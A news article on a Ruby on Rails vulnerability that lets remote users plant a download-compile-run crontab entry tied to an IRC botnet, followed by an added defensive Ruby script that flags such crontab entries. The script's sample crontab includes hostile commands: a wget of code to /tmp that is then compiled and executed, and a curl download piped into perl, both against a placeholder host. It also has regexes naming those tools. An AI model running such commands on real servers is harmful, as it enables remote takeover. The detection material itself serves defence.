POPULAR web application framework Ruby on Rails has a security vulnerability that could effectively hand control of web servers to third parties.
Ruby on Rails was an extremely fashionable way to develop web based applications rapidly a few years ago, and while its popularity has waned somewhat in recent years it is still a common framework for mid-sized web applications. Security researcher Jeff Jarmoc has documented a vulnerability in the framework that could lead to web servers being hijacked if left unpatched.
Jarmoc detailed the effect of the vulnerability by explaining that a remote user can add an entry to the crontab of the account the web application runs as, which downloads a file to the /tmp directory, compiles it and executes it. The compiled program connects to an IRC server, the usual command channel for a botnet client. The program itself is not the main problem: the fact that a flaw in the framework lets a remote user download code, compile it and execute it on the web server, with the privileges of the application account, is the serious security vulnerability.
The dropper script Jarmoc details has been around for a number of years and relies on the /tmp directory being world writeable on Linux and BSD Unix systems, so that a compromised account can always stage and build its payload there. Web servers such as Apache store temporary data in /tmp, which is why it is rarely locked down. Apache modules such as mod_security can block the request patterns used to deliver the exploit, and mounting /tmp with the noexec and nosuid options breaks the compile-and-run-from-/tmp step, but both only mitigate the attack rather than eliminating the underlying vulnerability: a payload staged in another writeable directory, or run through an interpreter, is unaffected. Only updating Rails removes it.
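The attack chain above, turned into detection logic, as an added example that is not from the article or from Jarmoc's write-up: a small Ruby script that parses crontab entries and flags ones that fetch a file, stage it in /tmp, compile it, or pipe a download straight into an interpreter. The crontab lines, host name and file names are constructed for the example and are not indicators from any real incident, and the heuristics are the example's own.

```ruby
# Added example: scan crontab entries for the download-to-/tmp, compile, run
# pattern described in the article. Not code from the article or from
# Jarmoc's analysis; the heuristics and sample data are this example's own.

CronEntry = Struct.new(:schedule, :command, :reasons)

# Crontab lines constructed for this example. The host, paths and file names
# are placeholders, not indicators from any real incident.
SAMPLE_CRONTAB = <<~CRON
  # m h dom mon dow command
  0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
  */5 * * * * /usr/bin/wget -q http://example.invalid/b.c -O /tmp/b.c && gcc /tmp/b.c -o /tmp/b && /tmp/b
  @reboot /tmp/.x/run.sh
  30 2 * * * curl -s http://example.invalid/p.pl | perl
  0 4 * * 0 /usr/local/bin/backup.sh --target /mnt/backup
CRON

DOWNLOADERS      = /\b(wget|curl|fetch|tftp)\b/
COMPILERS        = /\b(gcc|cc|g\+\+|clang|make)\b/
TMP_PATH         = %r{(\A|[\s=])/tmp/}
INTERPRETER_PIPE = /\|\s*(sh|bash|perl|python|ruby)\b/

# Split one crontab line into schedule and command. Comments, blank lines and
# environment assignments (FOO=bar) return nil. Both the five-field form and
# the "@reboot cmd" form are handled.
def parse_cron_line(line)
  line = line.strip
  return nil if line.empty? || line.start_with?('#')
  return nil if line.match?(/\A[A-Za-z_][A-Za-z0-9_]*=/)
  if line.start_with?('@')
    schedule, command = line.split(/\s+/, 2)
  else
    fields = line.split(/\s+/, 6)
    return nil if fields.size < 6
    schedule = fields[0, 5].join(' ')
    command  = fields[5]
  end
  CronEntry.new(schedule, command, [])
end

# Heuristics modelled on the chain in the article: fetch, stage in /tmp,
# compile, execute. They will also hit legitimate build jobs, so the output
# is for human review, not for automatic action.
def suspicious_reasons(command)
  reasons = []
  reasons << 'downloads content'                    if command.match?(DOWNLOADERS)
  reasons << 'writes to or runs from /tmp'          if command.match?(TMP_PATH)
  reasons << 'invokes a compiler'                   if command.match?(COMPILERS)
  reasons << 'pipes a download into an interpreter' if command.match?(INTERPRETER_PIPE)
  reasons
end

# An entry is flagged when two or more heuristics fire, or when the command
# itself lives in /tmp (a scheduled job should never execute from there).
def flagged?(entry)
  entry.reasons.size >= 2 || entry.command.start_with?('/tmp/')
end

# Parse a whole crontab and return only the flagged entries, with reasons.
def scan_crontab(text)
  text.each_line.map { |l| parse_cron_line(l) }.compact.each do |entry|
    entry.reasons = suspicious_reasons(entry.command)
  end.select { |entry| flagged?(entry) }
end

if __FILE__ == $0
  input = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_CRONTAB
  scan_crontab(input).each do |e|
    puts "FLAGGED [#{e.schedule}] #{e.command}"
    e.reasons.each { |r| puts "    - #{r}" }
  end
end
```

Run it against the saved output of `crontab -l -u <account>` for the account the Rails application runs as, and against /etc/cron.d, since the entry Jarmoc describes is written to the crontab of whichever user the exploited process runs as. On the constructed sample it flags three of the five entries; the logrotate and backup jobs pass.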
Chester Wisniewski, senior security advisor at Sophos, said Linux web servers are high value targets, adding, "Anytime there is a vulnerability in a widely deployed software stack like Ruby on Rails it takes years for all of the server administrators around the world to get around to patching it."
However, Wisniewski made a puzzling and inaccurate, FUD-like comment by suggesting that the vulnerability is made worse because it targets Linux servers. He said, "In fact it is likely far worse on Linux computers, which are perceived to be more secure and are not patched on a regular schedule like Windows, Java, Flash and other widely exploited software packages."
While it is true that Linux distributions don't have routine events similar to Microsoft's Patch Tuesday, there is little or no basis to Wisniewski's claim that systems running Linux do not get patched regularly. The open source community makes patches available as soon as they are developed and tested rather than waiting for the second Tuesday of every month, and most Linux distributions can apply these updates automatically over the internet, usually without a system restart. The caveat that matters here is that Rails is normally installed through RubyGems and Bundler rather than the distribution's package manager, so the distribution's automatic updates do not cover it: the application's own dependencies have to be updated and the application server restarted to load the new version. That is a property of how Rails applications are deployed, not of Linux, and one has to wonder why Wisniewski made such a sweeping, misleading statement.
Frequency of software updates aside, system administrators should update their installations of Ruby on Rails and restart the application servers that load them. µ